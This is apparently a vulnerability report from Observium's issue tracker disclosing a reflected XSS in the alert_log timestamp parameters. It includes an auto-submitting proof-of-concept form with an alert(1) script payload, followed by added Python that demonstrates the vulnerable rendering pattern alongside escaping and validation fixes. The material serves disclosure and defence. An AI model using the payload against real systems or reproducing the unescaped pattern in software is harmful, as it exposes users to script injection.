Observium / OBS-1868

[Security] - Reflected XSS on /alert_log


Details

    Description

      Hello,

      Parameters "timestamp_from" and "timestamp_to" on a POST call to /alert_log/alert_log/ seem to be vulnerable to a Reflected Cross-Site Scripting vulnerability.

      Proof Of Concept Code:

      <form style="display:none" action="http://192.168.2.10/alert_log/alert_log/" method="POST">
          <input name="timestamp_from" value="&#39;&quot;--&gt;&lt;/style&gt;&lt;/scRipt&gt;&lt;scRipt&gt;alert(1)&lt;/scRipt&gt;"/> 
          <input name="timestamp_to" value=""/> 
          <input name="device_id%5b%5d" value="3"/> 
          <input name="alert_test_id%5b%5d" value="3"/> 
          <input name="log_type%5b%5d" value="ALERT_NOTIFY"/> 
      </form>
      <script> HTMLFormElement.prototype.submit.call(document.forms[0]);</script>

      Regards
      Himanshu
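Added illustration, not part of the report above and not Observium's own code: the report describes a value that is reflected into an HTML attribute unchanged, so a quote character closes the attribute and the remainder is parsed as markup. The example below takes the exact entity-encoded value from the PoC form, shows what the browser actually submits after decoding it, and renders it with the vulnerable concatenation pattern, with output encoding, and with validation plus encoding. The field-rendering helpers, the timestamp format and the script-tag check are assumptions made for this example.

```python
import html
import re

# The entity-encoded value attribute from the PoC form (copied from the report).
POC_FORM_VALUE = "&#39;&quot;--&gt;&lt;/style&gt;&lt;/scRipt&gt;&lt;scRipt&gt;alert(1)&lt;/scRipt&gt;"

# Accepted filter format, an assumption for this example: "YYYY-MM-DD HH:MM:SS" or empty.
TIMESTAMP_RE = re.compile(r"^\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}$")

# Heuristic used by the self-check below: an unescaped opening script tag.
SCRIPT_TAG_RE = re.compile(r"<\s*script", re.IGNORECASE)


def submitted_value(form_attribute_value):
    """What the server receives: the browser decodes the entities in the
    form's value attribute before it POSTs the field."""
    return html.unescape(form_attribute_value)


def render_field_unsafe(name, value):
    """Vulnerable pattern: the submitted value is concatenated into the page
    unchanged, so a quote in it closes the attribute and the rest is markup."""
    return '<input type="text" name="%s" value="%s"/>' % (name, value)


def render_field_escaped(name, value):
    """Output encoding only: escape &, <, >, " and ' so the value can never
    leave the attribute, whatever it contains."""
    return '<input type="text" name="%s" value="%s"/>' % (
        html.escape(name, quote=True), html.escape(value, quote=True))


def validate_timestamp(value):
    """Input validation (defence in depth): keep an empty string or a strict
    timestamp; anything else falls back to the empty default."""
    return value if value == "" or TIMESTAMP_RE.match(value) else ""


def render_field_hardened(name, value):
    """Validate, then escape. Escaping alone already defeats the PoC; the
    validation layer also keeps junk out of whatever consumes the filter."""
    return render_field_escaped(name, validate_timestamp(value))


def contains_script_tag(rendered_html):
    """Self-check: does the rendered fragment carry a real <script> tag?"""
    return SCRIPT_TAG_RE.search(rendered_html) is not None


if __name__ == "__main__":
    raw = submitted_value(POC_FORM_VALUE)
    print("server receives:", raw)
    renderers = (("unsafe", render_field_unsafe),
                 ("escaped", render_field_escaped),
                 ("hardened", render_field_hardened))
    for label, render in renderers:
        out = render("timestamp_from", raw)
        print("%-8s script tag present: %-5s %s" % (label, contains_script_tag(out), out))
```

The output-encoding step is the actual fix for this class of bug; the validation step is there to show that a strict whitelist for a field that only ever holds a timestamp costs nothing and removes the attacker's freedom entirely. Note that encoding must match the context the value lands in: `html.escape(..., quote=True)` is correct for a quoted HTML attribute, but a value echoed into a `<script>` block or a URL would need a different encoder.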

          People

            landy Mike Stupalov
            himanshudas Himanshu Das